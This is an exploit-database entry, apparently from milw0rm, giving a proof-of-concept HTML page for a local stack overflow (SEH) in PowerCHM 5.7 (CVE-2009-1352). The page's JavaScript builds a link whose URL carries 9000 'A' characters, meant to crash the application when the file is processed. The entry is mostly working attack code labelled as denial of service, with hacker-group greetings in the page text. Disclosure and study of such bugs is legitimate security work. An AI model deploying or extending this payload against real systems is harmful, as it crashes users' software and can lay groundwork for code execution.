PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)

Author: SuB-ZeRo
type: dos
platform: windows
port: 
date_added: 2009-04-13  
date_updated:   
verified: 1  
codes: OSVDB-53901;CVE-2009-1352  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8434.html  
<html>
<body>
<br>
<font style="font-family:arial;font-size:24px">PowerCHM 5.7 (Long url) Local stack overflow (SEH) POC</font><br>
<font style="font-family:arial;font-size:19px">found By SuB-ZeRo (fbh@hotmail.com) thnaks to hisok4</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:12px">Greetz:All friends and muslims HackeRs secdz.com</font><br>
<br>

<script language="JavaScript">
var crash = "http://";

for (i=0;i<9000;i++) crash +="%41";

crash += "/test.rar"

document.write ('<a href="' + crash + '">B00M!</a>');

</script>
</body>
</html>

# milw0rm.com [2009-04-14]